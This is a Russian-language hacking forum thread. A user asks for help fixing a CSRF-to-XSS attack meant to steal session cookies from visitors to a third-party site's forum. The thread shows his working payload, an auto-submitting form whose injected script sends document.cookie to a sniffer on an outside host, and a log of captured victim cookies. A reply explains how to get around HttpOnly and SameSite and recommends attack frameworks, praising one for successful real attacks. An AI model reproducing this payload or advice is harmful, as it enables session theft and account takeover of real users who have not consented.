Здравствуйте уважаемые форумчане столкнулся с такой проблемой есть сайт с xss ( другой сайт а не тот про который я писал в другой теме ) в форме поиска.Поиск осушуствляется методом post так вот для перехвата куки создал у себя на хосте файл perehod.html и вставил туда код Code: <form method="POST" action="https://sait.ru/forum/?act=search" name="explForm"> <input type=hidden name=q value=" "><script>img = new Image();img.src="http://domain.ru/snif.php?cookie="+document.cookie;</script>" > // это ссылка на снифер для кражи куки </form> <script language="Javascript"> setTimeout('explForm.submit()', 1); </script> вроде бы всё правильно юзер переходит по ссылке http://domain.ru/perehod.html после нескольких секунд перенаправляет на https://sait.ru/forum/?act=search но куки записываются не полностью нету SESID а только вот это Code: New cookie accept from at Saturday 22nd of May 2021 07:40:27 PM REFERER: http://domain.ru/perehod.html ====================== _ym_uid=1618669368878418167; _ym_d=1618669368; _ga=GA1.2.1294811097.1619781555; s_style=simple; s_order=desc ====================== скажите пожалуйста в чем ошибка и как исправить заранее спасибо.
Скорее всего кука HttpOnly, они "недоступны" JS-y. Так же, возможно, мешает SameSite, так как, по сути, юзается CSRF 2 XSS, и этот момент должен решиться дополнительным запросом с трастового ориджина. Более подробно про параметры кук можно прочитать тут, а про SameSite, в частности, тут.
Можно найти где-то отражение параметров, типа phpinfo и чего-то подобного и отправить себе, но это редкость. Сами куки-то не особо и нужны, XSS позволяет управлять клиентом. Т.е. можно сделать всё что нужно зарание, заложив последовательность действий в скрипт, а браузер жертвы выполнит в момент триггера XSS.
Вряд ли смогу помочь с чем-то конкретным, а общие вопросы можно задавать на форуме открыто Нет никаких проблем, для того чтобы научиться нужно сделать локальный стенд. Воссоздать приблизительные условия, т.е. поднять несколько виртуальных хостов, установить любую CMS на один из них, добавить туда XSS уязвимость или использовать общеизвестную, и с двух браузеров (атакующий/жертва) пробовать эксплуатировать. Для автоматической эксплуатации атаки существуют XSS фреймворки, типа BeEF. Но я бы порекомендовал тулзу от нашего МоА мембера @psihoz26 - el Scripto. Которая создавалась как раз для таких случаев и была не раз применена в реальных и, самое главное, успешных атаках. Имеет много готовых пресетов для известных CMS, изучая и используя которые можно слепить свой, админку и кучу решённых подводных камней возникающих при межсайтовом скриптинге. Как только локально всё получится, то и удалённо будет тоже ок, можно даже не сомневаться, останется только подкорректировать данные и урлы под требуемый кейс.